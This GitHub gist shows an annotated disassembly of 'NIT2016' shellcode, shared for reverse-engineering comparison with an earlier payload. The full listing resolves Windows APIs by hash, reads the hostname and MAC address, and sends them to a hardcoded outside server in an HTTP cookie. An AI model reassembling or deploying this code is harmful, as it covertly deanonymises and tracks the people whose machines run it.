Skip to content

Instantly share code, notes, and snippets.

@Wack0

Wack0/nit2016.asm

Created November 29, 2016 23:33
Show Gist options
  • Save Wack0/0fedb57beb90aae7f526ac6235ba85ef to your computer and use it in GitHub Desktop.
Save Wack0/0fedb57beb90aae7f526ac6235ba85ef to your computer and use it in GitHub Desktop.
Download ZIP
NIT2016? Very similar to the 2013 payload...
Raw
nit2016.asm
; Input MD5 : 614D07EF7777CFF5CFDF741587A097DA
; Input CRC32 : B326AB6B
; ---------------------------------------------------------------------------
; File Name : C:\Users\raylee\nit - Copy.bin
; Format : Binary file
; Base Address: 0000h Range: 0000h - 02FCh Loaded length: 02FCh
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
seg000 segment byte public 'CODE' use32
assume cs:seg000
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
cld
call shellcode_main
; =============== S U B R O U T I N E =======================================
api_call proc near
var_4 = dword ptr -4
pusha
mov ebp, esp
xor edx, edx
mov edx, fs:[edx+30h]
mov edx, [edx+0Ch]
mov edx, [edx+14h]
loc_15: ; CODE XREF: api_call+87j
mov esi, [edx+28h]
movzx ecx, word ptr [edx+26h]
xor edi, edi
loc_1E: ; CODE XREF: api_call+26j
xor eax, eax
lodsb
cmp al, 61h ; 'a'
jl short loc_27
sub al, 20h ; ' '
loc_27: ; CODE XREF: api_call+1Dj
ror edi, 0Dh
add edi, eax
loop loc_1E
push edx
push edi
mov edx, [edx+10h]
mov eax, [edx+3Ch]
add eax, edx
mov eax, [eax+78h]
test eax, eax
jz short loc_89
add eax, edx
push eax
mov ecx, [eax+18h]
mov ebx, [eax+20h]
add ebx, edx
loc_4A: ; CODE XREF: api_call+60j
jecxz short loc_88
dec ecx
mov esi, [ebx+ecx*4]
add esi, edx
xor edi, edi
loc_54: ; CODE XREF: api_call+58j
xor eax, eax
lodsb
ror edi, 0Dh
add edi, eax
cmp al, ah
jnz short loc_54
add edi, [ebp-8]
cmp edi, [ebp+24h]
jnz short loc_4A
pop eax
mov ebx, [eax+24h]
add ebx, edx
mov cx, [ebx+ecx*2]
mov ebx, [eax+1Ch]
add ebx, edx
mov eax, [ebx+ecx*4]
add eax, edx
mov [esp+28h+var_4], eax
pop ebx
pop ebx
popa
pop ecx
pop edx
push ecx
jmp eax
; ---------------------------------------------------------------------------
loc_88: ; CODE XREF: api_call:loc_4Aj
pop eax
loc_89: ; CODE XREF: api_call+37j
pop edi
pop edx
mov edx, [edx]
jmp short loc_15
api_call endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
shellcode_main proc near ; CODE XREF: seg000:00000001p
pop ebp
lea eax, [ebp+297h]
push eax
push 726774Ch
call ebp
test eax, eax
jz loc_22B
lea eax, [ebp+29Eh]
push eax
push 726774Ch
call ebp
test eax, eax
jz loc_22B
mov ebx, 190h
sub esp, ebx
push esp
push ebx
push 6B8029h
call ebp
add esp, ebx
test eax, eax
jnz loc_22B
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
push 0E0DF0FEAh
call ebp
xor ebx, ebx
not ebx
cmp ebx, eax
jz loc_22B
mov ebx, eax
loc_F3: ; CODE XREF: shellcode_main+8Bj
push 0E21B2705h
push small 5000h
xor ecx, ecx
add cl, 2
push cx
mov edx, esp
push 10h
push edx
push ebx
push 6174A599h
call ebp
test eax, eax
jz short loc_11C
dec byte ptr [ebp+248h]
jnz short loc_F3
loc_11C: ; CODE XREF: shellcode_main+83j
mov eax, 100h
sub esp, eax
mov edx, esp
push edx
push eax
push edx
push 1DE49B6h
call ebp
pop edi
add esp, 100h
test eax, eax
jnz loc_234
push edi
call sub_23E
pop esi
mov edx, ecx
lea edi, [ebp+2A7h]
call sub_23E
dec edi
cmp edx, 20h ; ' '
jl short loc_15D
mov edx, 20h ; ' '
loc_15D: ; CODE XREF: shellcode_main+C7j
mov ecx, edx
push esi
rep movsb
mov ecx, 0Dh
lea esi, [ebp+28Ah]
rep movsb
mov [ebp+244h], edi
pop esi
push esi
push 803428A9h
call ebp
test eax, eax
jz loc_234
mov cx, [eax+0Ah]
cmp cx, 4
jb loc_234
lea eax, [eax+0Ch]
mov eax, [eax]
mov ecx, [eax]
mov ecx, [ecx]
mov eax, 100h
push eax
mov edi, esp
sub esp, eax
mov esi, esp
push edi
push esi
push ecx
push ecx
push 0B8D27248h
call ebp
test eax, eax
add esp, 104h
movzx ecx, word ptr [edi]
cmp ecx, 6
jb short loc_234
mov ecx, 6
mov eax, 10h
sub esp, eax
mov edi, esp
mov edx, ecx
shl edx, 1
push eax
push edx
loc_1D8: ; CODE XREF: shellcode_main+173j
xor edx, edx
mov dl, [esi]
mov al, dl
and al, 0F0h
shr al, 4
cmp al, 9
ja short loc_1EB
add al, 30h ; '0'
jmp short loc_1ED
; ---------------------------------------------------------------------------
loc_1EB: ; CODE XREF: shellcode_main+156j
add al, 37h ; '7'
loc_1ED: ; CODE XREF: shellcode_main+15Aj
mov [edi], al
inc edi
mov al, dl
and al, 0Fh
cmp al, 9
ja short loc_1FC
add al, 30h ; '0'
jmp short loc_1FE
; ---------------------------------------------------------------------------
loc_1FC: ; CODE XREF: shellcode_main+167j
add al, 37h ; '7'
loc_1FE: ; CODE XREF: shellcode_main+16Bj
mov [edi], al
inc edi
inc esi
loop loc_1D8
pop ecx
sub edi, ecx
mov esi, edi
pop eax
add esp, eax
mov edi, [ebp+244h]
rep movsb
call sub_24F
xor eax, eax
push eax
push ecx
sub edi, ecx
dec edi
push edi
push ebx
push 5F38EBC2h
call ebp
jmp short loc_234
; ---------------------------------------------------------------------------
loc_22B: ; CODE XREF: shellcode_main+11j
; shellcode_main+27j ...
push 0
push 6F721347h
call ebp
loc_234: ; CODE XREF: shellcode_main+A9j
; shellcode_main+F1j ...
push ebx
push 614D6E75h
call ebp
jmp short loc_22B
shellcode_main endp
; =============== S U B R O U T I N E =======================================
sub_23E proc near ; CODE XREF: shellcode_main+B0p
; shellcode_main+BEp ...
xor ecx, ecx
not ecx
xor eax, eax
repne scasb
not ecx
dec ecx
retn
sub_23E endp
; ---------------------------------------------------------------------------
align 4
db 2 dup(0), 3
; =============== S U B R O U T I N E =======================================
sub_24F proc near ; CODE XREF: shellcode_main+185p
lea edi, [ebp+2A7h]
call sub_23E
dec edi
mov ecx, 4Fh ; 'O'
lea esi, [ebp+26Eh]
rep movsb
lea edi, [ebp+2A7h]
call sub_23E
retn
sub_24F endp
; ---------------------------------------------------------------------------
aAcceptEncoding db 0Dh,0Ah
db 'Accept-Encoding: gzip',0Dh,0Ah
db 0Dh,0Ah,0
aCookieMcWs2_32 db 0Dh,0Ah
db 'Cookie: MC='
aWs2_32 db 'ws2_32',0
aIphlpapi db 'IPHLPAPI',0
aGet0a821a8005d db 'GET /0a821a80/05dc0212 HTTP/1.1',0Dh,0Ah
db 'Host: ',0
align 4
dd 8 dup(0)
dd 41900000h
seg000 ends
end
@drmilhous
Copy link

Do you have the original binary that I could disassemble?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment